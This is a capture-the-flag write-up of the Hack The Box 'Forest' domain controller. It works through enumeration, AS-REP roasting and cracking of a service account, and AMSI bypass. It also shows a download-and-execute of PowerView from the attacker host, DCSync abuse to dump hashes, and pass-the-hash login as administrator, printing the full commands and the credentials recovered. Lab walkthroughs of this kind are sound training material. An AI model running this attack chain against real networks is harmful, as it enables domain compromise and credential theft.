Enumeration
Defining a helper variable containing the IP and doing some basic enumeration:
export ip=10.10.10.161
ping $ip # ttl 127
nmap -sC -sV $ip -p-
| Ports | Service | Notes |
|---|---|---|
| 53 | domain | Simple DNS Plus |
| 88 | kerberos-sec | Microsoft Windows Kerberos |
| 135 | msrpc | Microsoft Windows RPC |
| 139 | netbios-ssn | Microsoft Windows netbios-ssn |
| 389 | ldap | Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name) |
| 445 | microsoft-ds | Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB) |
| 464 | kpasswd5? | |
| 593 | ncacn_http | Microsoft Windows RPC over HTTP 1.0 |
| 636 | tcpwrapped | |
| 3268 | ldap | Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name) |
| 3269 | tcpwrapped | |
| 5985 | http | Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |
| 9389 | mc-nmf | .NET Message Framing |
| 49664-49667,49671,49677,49684,49706,49943 | msrpc | Microsoft Windows RPC |
| 49676 | ncacn_http | Windows RPC over HTTP 1.0 |
| Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows |
Ldap
Ldapsearch can be used to test anonymous access via the LDAP service:
ldapsearch -H ldap://$ip:389 -x -s base -b '' "(objectClass=*)" "*" +
This returns many results showing anonymous access is supported
ldapsearch
# extended LDIF
#
# LDAPv3
# base with scope baseObject
# filter: (objectClass=*)
# requesting: * +
#
#
dn:
currentTime: 20230722171608.0Z
subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=htb,DC=local
dsServiceName: CN=NTDS Settings,CN=FOREST,CN=Servers,CN=Default-First-Site-Nam
e,CN=Sites,CN=Configuration,DC=htb,DC=local
namingContexts: DC=htb,DC=local
namingContexts: CN=Configuration,DC=htb,DC=local
namingContexts: CN=Schema,CN=Configuration,DC=htb,DC=local
namingContexts: DC=DomainDnsZones,DC=htb,DC=local
namingContexts: DC=ForestDnsZones,DC=htb,DC=local
defaultNamingContext: DC=htb,DC=local
schemaNamingContext: CN=Schema,CN=Configuration,DC=htb,DC=local
configurationNamingContext: CN=Configuration,DC=htb,DC=local
rootDomainNamingContext: DC=htb,DC=local
supportedControl: 1.2.840.113556.1.4.319
supportedControl: 1.2.840.113556.1.4.801
supportedControl: 1.2.840.113556.1.4.473
supportedControl: 1.2.840.113556.1.4.528
supportedControl: 1.2.840.113556.1.4.417
supportedControl: 1.2.840.113556.1.4.619
supportedControl: 1.2.840.113556.1.4.841
supportedControl: 1.2.840.113556.1.4.529
supportedControl: 1.2.840.113556.1.4.805
supportedControl: 1.2.840.113556.1.4.521
supportedControl: 1.2.840.113556.1.4.970
supportedControl: 1.2.840.113556.1.4.1338
supportedControl: 1.2.840.113556.1.4.474
supportedControl: 1.2.840.113556.1.4.1339
supportedControl: 1.2.840.113556.1.4.1340
supportedControl: 1.2.840.113556.1.4.1413
supportedControl: 2.16.840.1.113730.3.4.9
supportedControl: 2.16.840.1.113730.3.4.10
supportedControl: 1.2.840.113556.1.4.1504
supportedControl: 1.2.840.113556.1.4.1852
supportedControl: 1.2.840.113556.1.4.802
supportedControl: 1.2.840.113556.1.4.1907
supportedControl: 1.2.840.113556.1.4.1948
supportedControl: 1.2.840.113556.1.4.1974
supportedControl: 1.2.840.113556.1.4.1341
supportedControl: 1.2.840.113556.1.4.2026
supportedControl: 1.2.840.113556.1.4.2064
supportedControl: 1.2.840.113556.1.4.2065
supportedControl: 1.2.840.113556.1.4.2066
supportedControl: 1.2.840.113556.1.4.2090
supportedControl: 1.2.840.113556.1.4.2205
supportedControl: 1.2.840.113556.1.4.2204
supportedControl: 1.2.840.113556.1.4.2206
supportedControl: 1.2.840.113556.1.4.2211
supportedControl: 1.2.840.113556.1.4.2239
supportedControl: 1.2.840.113556.1.4.2255
supportedControl: 1.2.840.113556.1.4.2256
supportedControl: 1.2.840.113556.1.4.2309
supportedLDAPVersion: 3
supportedLDAPVersion: 2
supportedLDAPPolicies: MaxPoolThreads
supportedLDAPPolicies: MaxPercentDirSyncRequests
supportedLDAPPolicies: MaxDatagramRecv
supportedLDAPPolicies: MaxReceiveBuffer
supportedLDAPPolicies: InitRecvTimeout
supportedLDAPPolicies: MaxConnections
supportedLDAPPolicies: MaxConnIdleTime
supportedLDAPPolicies: MaxPageSize
supportedLDAPPolicies: MaxBatchReturnMessages
supportedLDAPPolicies: MaxQueryDuration
supportedLDAPPolicies: MaxDirSyncDuration
supportedLDAPPolicies: MaxTempTableSize
supportedLDAPPolicies: MaxResultSetSize
supportedLDAPPolicies: MinResultSets
supportedLDAPPolicies: MaxResultSetsPerConn
supportedLDAPPolicies: MaxNotificationPerConn
supportedLDAPPolicies: MaxValRange
supportedLDAPPolicies: MaxValRangeTransitive
supportedLDAPPolicies: ThreadMemoryLimit
supportedLDAPPolicies: SystemMemoryLimitPercent
highestCommittedUSN: 4032460
supportedSASLMechanisms: GSSAPI
supportedSASLMechanisms: GSS-SPNEGO
supportedSASLMechanisms: EXTERNAL
supportedSASLMechanisms: DIGEST-MD5
dnsHostName: FOREST.htb.local
ldapServiceName: htb.local:forest$@HTB.LOCAL
serverName: CN=FOREST,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Config
uration,DC=htb,DC=local
supportedCapabilities: 1.2.840.113556.1.4.800
supportedCapabilities: 1.2.840.113556.1.4.1670
supportedCapabilities: 1.2.840.113556.1.4.1791
supportedCapabilities: 1.2.840.113556.1.4.1935
supportedCapabilities: 1.2.840.113556.1.4.2080
supportedCapabilities: 1.2.840.113556.1.4.2237
isSynchronized: TRUE
isGlobalCatalogReady: TRUE
domainFunctionality: 7
forestFunctionality: 7
domainControllerFunctionality: 7
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
Windapsearch is another tool which may be used to run queries, e.g.
./windapsearch-linux-amd64 --dc $ip -m custom --filter ((objectClass=*))
A GUI method for enumerating the information is Jxplorer. Using this program and connecting to the host it can be found that there is a service svc-alfresco
disabled, leaving the account vulnerable to As-Rep Roasting.
As-Rep Roasting - Hash dump from TGT Ticket
Impackets GetNPUsers can be used to dump the hash through the As-rep roasting vulnerability
./GetNPUsers.py -dc-ip 10.10.10.161 -no-pass htb.local/svc-alfresco
There is also an msfconsole module which can do the same function auxiliary/scanner/kerberos/kerberos_login however at time of writing this produced an incorrect hash for this lab.
Hash:
$krb5asrep$23$svc-alfresco@HTB.LOCAL:66855604810fbd254fd37bcca563f13e$302dfc2242406fd902c8f205bf6580761dab6909dd373cb409f77664d4176d3401f17bd6d51af64aa1f339ca2f13ed00921c6bd102420cecdeca0584cdcde7969cf208d98f5f85916989c285f673ce40c7e6d49280e7ad4d8a0816335ef654146996736a7dccf9694015e1ed5f44979142c49dbfd26db23cf1205950f26944bce63cbb579caa12e1fcefaf4d819cadd8289769f3af5614a86d61b3c3fa3973b754449f752690498293f00f7286351898d789e42ea2d4e85f11b6b1c65bf685bd5caa1ffd7d3ec3e4fbed67674adca7367ea30df77db8974e203a1fce1d361b0ec6bd87b8d8a6
Cracking this with john yields a password:
# use an eitor to write hash to a file named hash
john hash --fork=4 -w=/usr/share/wordlists/rockyou.txt
Now a shell is possible through the winrm service using Evil-WinRM and recover the user flag
evil-winrm -i $ip -u svc-alfresco -p s3rvice
type ../Desktop/user.txt
BloodHound Enumeration
Bloodhoun-Python can be used to gather the input data into NEo4J which feeds into BloodHound. Once the data is loaded in and views created, it can be used to find a path for priveldge escalation:
bloodhound-python -d htb.local -gc forest.htb.local -u svc-alfresco -p s3rvice -c all -ns 10.10.10.161
sudo neo4j start
bloodhound
A path to Administrative privileges has been identified through the WriteDacl role. Using this privilege a new user can be created and given DCSync rights which can be used to dump hashes.
Privilege Escalation
From within the Evil-WinRM Session:
net user hacker aaa111! /add /domain
net group "Exchange Windows Permissions" hacker /add
net localgroup "Remote Management Users" hacker /add
Enabling script execution via Bypass-4MSI which is part of Evil-WinRM
menu
Bypass-4MSI
And running the PowerView script which is part of PowerSploit and needed to gain access to the Add-ObjectACL command:
# start web sevrer at /usr/share/windows-resources/powersploit/Recon
sudo python -m http.server 80
# on evil-winRM
iex(new-object net.webclient).downloadstring('http://10.10.14.11/PowerView.ps1')
Finish configuring the new user with DCSync rights:
$pass = convertto-securestring 'aaa111!' -asplain -force
$cred = new-object system.management.automation.pscredential('htb\hacker', $pass)
Add-ObjectACL -PrincipalIdentity hacker -Credential $cred -Rights DCSync
Metasploit through impackets secretdump can now be used to leverage the hacker account and dump hashes:
msfconsole
use scanner/smb/impacket/secretsdump
set rhosts 10.10.10.161
set smbuser hacker
set smbpass aaa111!
set SMBDomain htb.local
set ExecMethod wmiexec
run
This returns hashes which include
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
This hash can be used to loign through psexec
./psexec.py administrator@10.10.10.161 -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6
type C:\Users\Administrator\Desktop\root.txt